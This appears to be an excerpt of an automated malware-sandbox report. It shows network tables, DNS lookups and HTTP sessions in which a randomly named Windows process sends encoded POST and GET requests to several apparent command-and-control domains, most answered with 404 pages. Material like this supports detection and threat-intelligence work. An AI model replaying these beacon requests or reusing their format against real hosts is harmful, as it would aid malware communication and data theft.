                                              Jan 10, 2025 20:10:14.568363905 CET804999045.158.77.253192.168.2.6
                                              Jan 10, 2025 20:10:14.568537951 CET4999080192.168.2.645.158.77.253
                                              Jan 10, 2025 20:10:14.586193085 CET4999080192.168.2.645.158.77.253
                                              Jan 10, 2025 20:10:14.591022968 CET804999045.158.77.253192.168.2.6
                                              Jan 10, 2025 20:10:14.591169119 CET804999045.158.77.253192.168.2.6
                                              Jan 10, 2025 20:10:15.224539995 CET804999045.158.77.253192.168.2.6
                                              Jan 10, 2025 20:10:15.224684954 CET804999045.158.77.253192.168.2.6
                                              Jan 10, 2025 20:10:15.225068092 CET4999080192.168.2.645.158.77.253
                                              Jan 10, 2025 20:10:16.090969086 CET4999080192.168.2.645.158.77.253
                                              Jan 10, 2025 20:10:17.109667063 CET4999180192.168.2.645.158.77.253
                                              Jan 10, 2025 20:10:17.114500046 CET804999145.158.77.253192.168.2.6
                                              Jan 10, 2025 20:10:17.114686012 CET4999180192.168.2.645.158.77.253
                                              Jan 10, 2025 20:10:17.122510910 CET4999180192.168.2.645.158.77.253
                                              Jan 10, 2025 20:10:17.127280951 CET804999145.158.77.253192.168.2.6
                                              Jan 10, 2025 20:10:17.773442030 CET804999145.158.77.253192.168.2.6
                                              Jan 10, 2025 20:10:17.773633003 CET804999145.158.77.253192.168.2.6
                                              Jan 10, 2025 20:10:17.773741007 CET4999180192.168.2.645.158.77.253
                                              Jan 10, 2025 20:10:17.776437998 CET4999180192.168.2.645.158.77.253
                                              Jan 10, 2025 20:10:17.784817934 CET804999145.158.77.253192.168.2.6
                                              Jan 10, 2025 20:10:23.131254911 CET4999280192.168.2.6156.242.132.82
                                              Jan 10, 2025 20:10:23.136640072 CET8049992156.242.132.82192.168.2.6
                                              Jan 10, 2025 20:10:23.136776924 CET4999280192.168.2.6156.242.132.82
                                              Jan 10, 2025 20:10:23.148283958 CET4999280192.168.2.6156.242.132.82
                                              Jan 10, 2025 20:10:23.153107882 CET8049992156.242.132.82192.168.2.6
                                              Jan 10, 2025 20:10:24.158055067 CET8049992156.242.132.82192.168.2.6
                                              Jan 10, 2025 20:10:24.158122063 CET4999280192.168.2.6156.242.132.82
                                              Jan 10, 2025 20:10:24.660203934 CET4999280192.168.2.6156.242.132.82
                                              Jan 10, 2025 20:10:24.665038109 CET8049992156.242.132.82192.168.2.6
                                              Jan 10, 2025 20:10:25.673610926 CET4999380192.168.2.6156.242.132.82
                                              Jan 10, 2025 20:10:25.678400993 CET8049993156.242.132.82192.168.2.6
                                              Jan 10, 2025 20:10:25.678478003 CET4999380192.168.2.6156.242.132.82
                                              Jan 10, 2025 20:10:25.693370104 CET4999380192.168.2.6156.242.132.82
                                              Jan 10, 2025 20:10:25.698276043 CET8049993156.242.132.82192.168.2.6
                                              Jan 10, 2025 20:10:27.200423956 CET4999380192.168.2.6156.242.132.82
                                              Jan 10, 2025 20:10:27.246337891 CET8049993156.242.132.82192.168.2.6
                                              Jan 10, 2025 20:10:28.219345093 CET4999580192.168.2.6156.242.132.82
                                              Jan 10, 2025 20:10:28.224359035 CET8049995156.242.132.82192.168.2.6
                                              Jan 10, 2025 20:10:28.224478006 CET4999580192.168.2.6156.242.132.82
                                              Jan 10, 2025 20:10:28.236723900 CET4999580192.168.2.6156.242.132.82
                                              Jan 10, 2025 20:10:28.241561890 CET8049995156.242.132.82192.168.2.6
                                              Jan 10, 2025 20:10:28.241677046 CET8049995156.242.132.82192.168.2.6
                                              Jan 10, 2025 20:10:29.747303009 CET4999580192.168.2.6156.242.132.82
                                              Jan 10, 2025 20:10:29.798316002 CET8049995156.242.132.82192.168.2.6
                                              Jan 10, 2025 20:10:30.766520977 CET4999680192.168.2.6156.242.132.82
                                              Jan 10, 2025 20:10:30.771332026 CET8049996156.242.132.82192.168.2.6
                                              Jan 10, 2025 20:10:30.771739006 CET4999680192.168.2.6156.242.132.82
                                              Jan 10, 2025 20:10:30.781498909 CET4999680192.168.2.6156.242.132.82
                                              Jan 10, 2025 20:10:30.786344051 CET8049996156.242.132.82192.168.2.6
                                              Jan 10, 2025 20:10:47.042182922 CET8049993156.242.132.82192.168.2.6
                                              Jan 10, 2025 20:10:47.042543888 CET4999380192.168.2.6156.242.132.82
                                              Jan 10, 2025 20:10:49.624166965 CET8049995156.242.132.82192.168.2.6
                                              Jan 10, 2025 20:10:49.624237061 CET4999580192.168.2.6156.242.132.82
                                              Jan 10, 2025 20:10:52.136240959 CET8049996156.242.132.82192.168.2.6
                                              Jan 10, 2025 20:10:52.136389971 CET4999680192.168.2.6156.242.132.82
                                              Jan 10, 2025 20:10:52.169337034 CET4999680192.168.2.6156.242.132.82
                                              Jan 10, 2025 20:10:52.174294949 CET8049996156.242.132.82192.168.2.6
                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 10, 2025 20:09:39.711076975 CET5788853192.168.2.61.1.1.1
                                              Jan 10, 2025 20:09:39.723521948 CET53578881.1.1.1192.168.2.6
                                              Jan 10, 2025 20:09:55.344496012 CET5877853192.168.2.61.1.1.1
                                              Jan 10, 2025 20:09:55.707279921 CET53587781.1.1.1192.168.2.6
                                              Jan 10, 2025 20:10:09.454257011 CET6417853192.168.2.61.1.1.1
                                              Jan 10, 2025 20:10:09.466022968 CET53641781.1.1.1192.168.2.6
                                              Jan 10, 2025 20:10:22.782578945 CET5208753192.168.2.61.1.1.1
                                              Jan 10, 2025 20:10:23.128447056 CET53520871.1.1.1192.168.2.6
                                              Jan 10, 2025 20:10:58.376121998 CET6167453192.168.2.61.1.1.1
                                              Jan 10, 2025 20:10:58.387322903 CET53616741.1.1.1192.168.2.6
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Jan 10, 2025 20:09:39.711076975 CET192.168.2.61.1.1.10xddafStandard query (0)www.easestore.shopA (IP address)IN (0x0001)false
                                              Jan 10, 2025 20:09:55.344496012 CET192.168.2.61.1.1.10xe722Standard query (0)www.yu35n.topA (IP address)IN (0x0001)false
                                              Jan 10, 2025 20:10:09.454257011 CET192.168.2.61.1.1.10x6314Standard query (0)www.moritynomxd.xyzA (IP address)IN (0x0001)false
                                              Jan 10, 2025 20:10:22.782578945 CET192.168.2.61.1.1.10xc9b0Standard query (0)www.shanhaiguan.netA (IP address)IN (0x0001)false
                                              Jan 10, 2025 20:10:58.376121998 CET192.168.2.61.1.1.10x6bd9Standard query (0)www.wearenotgoingback.infoA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Jan 10, 2025 20:09:39.723521948 CET1.1.1.1192.168.2.60xddafNo error (0)www.easestore.shopshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                              Jan 10, 2025 20:09:39.723521948 CET1.1.1.1192.168.2.60xddafNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                              Jan 10, 2025 20:09:55.707279921 CET1.1.1.1192.168.2.60xe722No error (0)www.yu35n.topyu35n.topCNAME (Canonical name)IN (0x0001)false
                                              Jan 10, 2025 20:09:55.707279921 CET1.1.1.1192.168.2.60xe722No error (0)yu35n.top154.23.178.183A (IP address)IN (0x0001)false
                                              Jan 10, 2025 20:10:09.466022968 CET1.1.1.1192.168.2.60x6314No error (0)www.moritynomxd.xyz45.158.77.253A (IP address)IN (0x0001)false
                                              Jan 10, 2025 20:10:23.128447056 CET1.1.1.1192.168.2.60xc9b0No error (0)www.shanhaiguan.net156.242.132.82A (IP address)IN (0x0001)false
                                              Jan 10, 2025 20:10:58.387322903 CET1.1.1.1192.168.2.60x6bd9No error (0)www.wearenotgoingback.infowearenotgoingback.infoCNAME (Canonical name)IN (0x0001)false
                                              Jan 10, 2025 20:10:58.387322903 CET1.1.1.1192.168.2.60x6bd9No error (0)wearenotgoingback.info76.223.105.230A (IP address)IN (0x0001)false
                                              Jan 10, 2025 20:10:58.387322903 CET1.1.1.1192.168.2.60x6bd9No error (0)wearenotgoingback.info13.248.243.5A (IP address)IN (0x0001)false
                                              • www.easestore.shop
                                              • www.yu35n.top
                                              • www.moritynomxd.xyz
                                              • www.shanhaiguan.net
                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.64996923.227.38.74806688C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 10, 2025 20:09:39.744076014 CET371OUTGET /0uas/?bxDtSjJ8=FK3Zuh6BkOWpER34C4EAhDGO4fUWDG3gpGQoKnLE1ObgDCKX41lpJTACl9ojRQ7K5i+hNgB3lCh6TNQwIH2qK1aJmzOxGvULLN47dZXmS7DKEcomGl93d/9sBop2npa8gzI/odg=&zj=orBTgZEhYzzl76 HTTP/1.1
                                              Host: www.easestore.shop
                                              Accept: */*
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAARJS)
                                              Jan 10, 2025 20:09:40.292552948 CET1236INHTTP/1.1 301 Moved Permanently
                                              Date: Fri, 10 Jan 2025 19:09:40 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 0
                                              Connection: close
                                              x-sorting-hat-podid: 304
                                              x-sorting-hat-shopid: 89575588145
                                              x-storefront-renderer-rendered: 1
                                              location: https://www.easestore.shop/0uas?bxDtSjJ8=FK3Zuh6BkOWpER34C4EAhDGO4fUWDG3gpGQoKnLE1ObgDCKX41lpJTACl9ojRQ7K5i+hNgB3lCh6TNQwIH2qK1aJmzOxGvULLN47dZXmS7DKEcomGl93d/9sBop2npa8gzI/odg=&zj=orBTgZEhYzzl76
                                              x-redirect-reason: https_required
                                              x-frame-options: DENY
                                              content-security-policy: frame-ancestors 'none';
                                              x-shopid: 89575588145
                                              x-shardid: 304
                                              vary: Accept
                                              powered-by: Shopify
                                              server-timing: processing;dur=18, db;dur=9, db_async;dur=6.575, asn;desc="3356", edge;desc="EWR", country;desc="US", pageType;desc="404", servedBy;desc="s7dg", requestID;desc="193bee23-2f70-4845-aae6-b58d8b9740e4-1736536180"
                                              x-dc: gcp-us-east1,gcp-us-east1,gcp-us-east1
                                              x-request-id: 193bee23-2f70-4845-aae6-b58d8b9740e4-1736536180
                                              Alt-Svc: h3=":443"; ma=86400
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RtL3kabCH4NtnEQlgO3owyQwlEx2B8dYl9ZRKa3BK758ID7v8SGe3aXGNF6ao8uDCcH9LwvIivqP74z0sKa5%2BvkveKDZIm8IqwZRoVfBaTRnkHI6laGDVo0sHOZ85bEEV8l8
                                              Data Raw:
                                              Data Ascii:
                                              Jan 10, 2025 20:09:40.292572975 CET352INData Raw: 51 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 31 2c 22 72 65 70 6f
                                              Data Ascii: Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=77.000141X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.649984154.23.178.183806688C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 10, 2025 20:09:55.727380991 CET614OUTPOST /k4q2/ HTTP/1.1
                                              Host: www.yu35n.top
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.yu35n.top
                                              Referer: http://www.yu35n.top/k4q2/
                                              Content-Type: application/x-www-form-urlencoded
                                              Connection: close
                                              Content-Length: 213
                                              Cache-Control: no-cache
                                              User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAARJS)
                                              Data Raw: 62 78 44 74 53 6a 4a 38 3d 47 44 34 6f 33 4d 75 50 2b 34 4b 38 43 76 52 61 32 39 77 34 31 75 5a 6b 76 6a 33 6d 65 64 70 51 33 57 72 4a 52 7a 75 38 51 62 6f 73 58 4c 62 67 2b 56 73 4d 43 43 69 2f 4e 70 76 4d 67 4c 6f 61 49 71 69 6f 44 2f 56 69 4c 74 72 69 37 78 64 72 56 70 6f 70 30 64 74 72 73 78 6f 64 46 78 46 2b 2b 34 32 6e 41 2b 64 36 7a 72 43 76 77 44 6b 78 46 32 66 4e 30 47 52 54 32 33 79 66 44 4a 6d 5a 4c 77 6d 48 79 2f 62 58 6c 71 63 55 32 35 61 48 4f 68 48 52 77 58 72 70 45 67 55 45 54 67 62 59 4c 4c 64 75 78 38 56 55 7a 34 46 75 42 30 47 4f 41 6d 55 66 7a 49 56 6f 6b 65 6d 69 6b 73 79 4c 79 58 48 33 5a 4e 73 68 52 56 2f 67
                                              Data Ascii: bxDtSjJ8=GD4o3MuP+4K8CvRa29w41uZkvj3medpQ3WrJRzu8QbosXLbg+VsMCCi/NpvMgLoaIqioD/ViLtri7xdrVpop0dtrsxodFxF++42nA+d6zrCvwDkxF2fN0GRT23yfDJmZLwmHy/bXlqcU25aHOhHRwXrpEgUETgbYLLdux8VUz4FuB0GOAmUfzIVokemiksyLyXH3ZNshRV/g
                                              Jan 10, 2025 20:09:56.612174988 CET312INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Fri, 10 Jan 2025 19:09:56 GMT
                                              Content-Type: text/html
                                              Content-Length: 148
                                              Connection: close
                                              ETag: "67811755-94"
                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.649985154.23.178.183806688C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 10, 2025 20:09:58.266921997 CET638OUTPOST /k4q2/ HTTP/1.1
                                              Host: www.yu35n.top
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.yu35n.top
                                              Referer: http://www.yu35n.top/k4q2/
                                              Content-Type: application/x-www-form-urlencoded
                                              Connection: close
                                              Content-Length: 237
                                              Cache-Control: no-cache
                                              User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAARJS)
                                              Data Raw: 62 78 44 74 53 6a 4a 38 3d 47 44 34 6f 33 4d 75 50 2b 34 4b 38 4e 75 68 61 7a 63 77 34 68 2b 59 57 7a 7a 33 6d 4c 74 70 55 33 58 58 4a 52 33 33 68 51 76 45 73 53 65 6e 67 2f 55 73 4d 48 43 69 2f 47 4a 76 4e 71 72 6f 72 49 71 75 61 44 36 31 69 4c 70 44 69 37 7a 31 72 56 65 38 71 31 4e 74 74 67 52 6f 66 42 78 46 2b 2b 34 32 6e 41 39 68 41 7a 71 71 76 77 7a 55 78 48 53 72 4b 71 57 52 51 78 33 79 66 48 4a 6e 51 4c 77 6d 70 79 36 36 66 6c 73 51 55 32 37 53 48 4b 6c 72 65 36 58 72 6a 62 51 56 6f 55 7a 69 6a 53 4b 56 6a 35 2f 31 35 72 71 74 6d 4e 69 48 55 63 56 55 38 68 59 31 71 6b 63 2b 51 6b 4d 79 68 77 58 2f 33 4c 61 67 47 65 68 61 44 6e 32 7a 71 72 65 6c 36 67 62 46 49 66 66 77 39 6a 4e 41 30 4b 51 3d 3d
                                              Data Ascii: bxDtSjJ8=GD4o3MuP+4K8Nuhazcw4h+YWzz3mLtpU3XXJR33hQvEsSeng/UsMHCi/GJvNqrorIquaD61iLpDi7z1rVe8q1NttgRofBxF++42nA9hAzqqvwzUxHSrKqWRQx3yfHJnQLwmpy66flsQU27SHKlre6XrjbQVoUzijSKVj5/15rqtmNiHUcVU8hY1qkc+QkMyhwX/3LagGehaDn2zqrel6gbFIffw9jNA0KQ==
                                              Jan 10, 2025 20:09:59.178783894 CET312INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Fri, 10 Jan 2025 19:09:59 GMT
                                              Content-Type: text/html
                                              Content-Length: 148
                                              Connection: close
                                              ETag: "67811755-94"
                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.649986154.23.178.183806688C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 10, 2025 20:10:00.814007044 CET1651OUTPOST /k4q2/ HTTP/1.1
                                              Host: www.yu35n.top
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.yu35n.top
                                              Referer: http://www.yu35n.top/k4q2/
                                              Content-Type: application/x-www-form-urlencoded
                                              Connection: close
                                              Content-Length: 1249
                                              Cache-Control: no-cache
                                              User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAARJS)
                                              Data Raw: 62 78 44 74 53 6a 4a 38 3d 47 44 34 6f 33 4d 75 50 2b 34 4b 38 4e 75 68 61 7a 63 77 34 68 2b 59 57 7a 7a 33 6d 4c 74 70 55 33 58 58 4a 52 33 33 68 51 76 4d 73 53 4d 66 67 2b 33 55 4d 45 43 69 2f 46 4a 76 41 71 72 6f 79 49 70 65 65 44 36 35 59 4c 76 48 69 71 67 4e 72 64 4b 51 71 73 64 74 74 39 68 6f 61 46 78 45 6b 2b 34 6e 67 41 2b 5a 41 7a 71 71 76 77 78 38 78 41 47 66 4b 6f 57 52 54 32 33 79 44 44 4a 6e 38 4c 77 2f 55 79 36 50 39 6c 63 77 55 78 59 36 48 4d 47 54 65 32 58 72 6c 61 51 56 77 55 79 65 38 53 4b 59 61 35 2b 52 54 72 71 5a 6d 49 6e 47 56 4d 57 55 6f 34 4c 46 4a 38 2f 37 78 6e 36 50 55 2b 67 54 6d 46 62 41 51 57 6a 32 79 73 52 62 38 72 74 51 61 75 71 51 68 63 4b 31 2f 77 2b 74 66 65 6b 73 51 34 6c 35 2f 42 61 71 59 56 30 66 46 32 54 52 6d 71 55 6a 4b 61 72 2b 55 6e 33 49 6e 69 68 4d 6f 49 65 76 74 30 49 49 59 4f 4a 55 38 6d 30 57 6d 44 61 37 38 42 2b 37 6d 79 31 67 76 7a 45 50 54 37 36 57 37 34 67 44 6f 59 49 38 45 67 43 7a 30 31 61 67 49 56 37 36 30 33 48 72 52 77 66 79 6f 50 69 64 4f 2b [TRUNCATED]
                                              Data Ascii: bxDtSjJ8=GD4o3MuP+4K8Nuhazcw4h+YWzz3mLtpU3XXJR33hQvMsSMfg+3UMECi/FJvAqroyIpeeD65YLvHiqgNrdKQqsdtt9hoaFxEk+4ngA+ZAzqqvwx8xAGfKoWRT23yDDJn8Lw/Uy6P9lcwUxY6HMGTe2XrlaQVwUye8SKYa5+RTrqZmInGVMWUo4LFJ8/7xn6PU+gTmFbAQWj2ysRb8rtQauqQhcK1/w+tfeksQ4l5/BaqYV0fF2TRmqUjKar+Un3InihMoIevt0IIYOJU8m0WmDa78B+7my1gvzEPT76W74gDoYI8EgCz01agIV7603HrRwfyoPidO+5xGDcYsflPfB/E1aY+r5rtxAavA5CX9gvRMytixKot6CxdI9vRhVs0xRGkrpbmPtNr/O6Ra7ljub0DJH4UFiAFVIZwg+YiE7bT8BNnWyuGFw7VUENGhLKsRJ19TRH4t33NamPpCoA25Gn7reWst8snhUykN4xr24cpfmXjSpi2AbJbouh7PzKJbCMHYopxmpJD75Hxav/cEV71vNqts8IMeVoZaSU2wZ8THDdQJ5VOV+9aQLcGOG7MMO+lDe111TU/YmICO0xntrZc3StyCKqChoVDuKG1HAbMy0TmA1AJ1SjiZFZ81+uVDQlYn8yZiNukujXDQTT4YMFZgAQmB4FWMFoo0sF30oXSJB/NMQ6vMhM91S5QydwajuuHLjwU3kebIow39VO9UylHpGeZjTAoIHxjuxRFKHda24eAxxPa1d6skCepM7ZpiAaaXjt32WhXcp2jKNKaU0IK+310Nao9rihp9NULka/yy4By6i5oAq16gd0+3yZbcCCuJIS0xd3yV00GIx71oq7xm6p/K4o3blZvCqrbEiK2zfTViiTXbG0AwIgFPUVH3xiIbJ1BYogurbJPAjwIp0SFCrYxjxElEqD6scTD9C+O6YjMsewFsu+xpF2wic3V7psAQFuTtdNt5LvEvprcWdlvKECC5rk9OBt0FlQlPdzQ [TRUNCATED]
                                              Jan 10, 2025 20:10:01.790316105 CET312INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Fri, 10 Jan 2025 19:10:01 GMT
                                              Content-Type: text/html
                                              Content-Length: 148
                                              Connection: close
                                              ETag: "67811755-94"
                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.649987154.23.178.183806688C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 10, 2025 20:10:03.358057976 CET366OUTGET /k4q2/?bxDtSjJ8=LBQI05KptpfuDcZW7JoIpuF74BnNKfAu333BOVzeV95OEtTp/i4HGB65IJHwn48sc6noL6ZERte3tTxWC6Id5pYWrwAdGl9yxaqIHeQzu/Ta2AAfF3von29M/1uaALX4Ci+P/fk=&zj=orBTgZEhYzzl76 HTTP/1.1
                                              Host: www.yu35n.top
                                              Accept: */*
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAARJS)
                                              Jan 10, 2025 20:10:04.434075117 CET312INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Fri, 10 Jan 2025 19:10:04 GMT
                                              Content-Type: text/html
                                              Content-Length: 148
                                              Connection: close
                                              ETag: "67811755-94"
                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.64998845.158.77.253806688C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 10, 2025 20:10:09.485786915 CET632OUTPOST /o5i7/ HTTP/1.1
                                              Host: www.moritynomxd.xyz
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.moritynomxd.xyz
                                              Referer: http://www.moritynomxd.xyz/o5i7/
                                              Content-Type: application/x-www-form-urlencoded
                                              Connection: close
                                              Content-Length: 213
                                              Cache-Control: no-cache
                                              User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAARJS)
                                              Data Raw: 62 78 44 74 53 6a 4a 38 3d 5a 78 34 4b 6b 51 76 78 42 4c 2f 59 6a 4e 4a 67 59 70 76 73 41 39 53 5a 47 66 36 56 49 6c 44 51 7a 59 75 4d 44 67 33 44 4d 53 4f 4e 4d 4f 5a 44 45 39 53 59 71 52 35 37 77 53 31 63 69 68 79 31 56 41 58 31 78 46 2b 6b 4f 70 66 53 72 45 35 42 63 2b 78 47 4b 55 4b 64 71 77 63 59 39 77 70 4f 6d 48 54 4b 5a 7a 2b 4f 75 69 59 70 71 5a 73 31 41 73 34 6f 67 31 4d 44 66 66 2f 6e 70 6d 44 55 78 76 43 72 47 48 43 41 56 51 70 53 63 61 67 2f 46 4d 35 70 33 45 57 66 78 64 6d 77 6f 50 6a 51 58 49 5a 64 71 57 38 31 62 36 78 57 5a 45 35 34 45 6e 36 47 54 67 4a 42 77 32 76 4b 5a 6a 35 4f 71 52 68 66 4d 6b 42 6c 61 62 37 75
                                              Data Ascii: bxDtSjJ8=Zx4KkQvxBL/YjNJgYpvsA9SZGf6VIlDQzYuMDg3DMSONMOZDE9SYqR57wS1cihy1VAX1xF+kOpfSrE5Bc+xGKUKdqwcY9wpOmHTKZz+OuiYpqZs1As4og1MDff/npmDUxvCrGHCAVQpScag/FM5p3EWfxdmwoPjQXIZdqW81b6xWZE54En6GTgJBw2vKZj5OqRhfMkBlab7u
                                              Jan 10, 2025 20:10:10.167418003 CET729INHTTP/1.1 200 OK
                                              Content-Type: text/html; charset=utf-8
                                              X-Address: gin_throttle_mw_7200000000_8.46.123.189
                                              X-Ratelimit-Limit: 500
                                              X-Ratelimit-Remaining: 499
                                              X-Ratelimit-Reset: 1736539810
                                              Date: Fri, 10 Jan 2025 19:10:10 GMT
                                              Content-Length: 458
                                              Connection: close
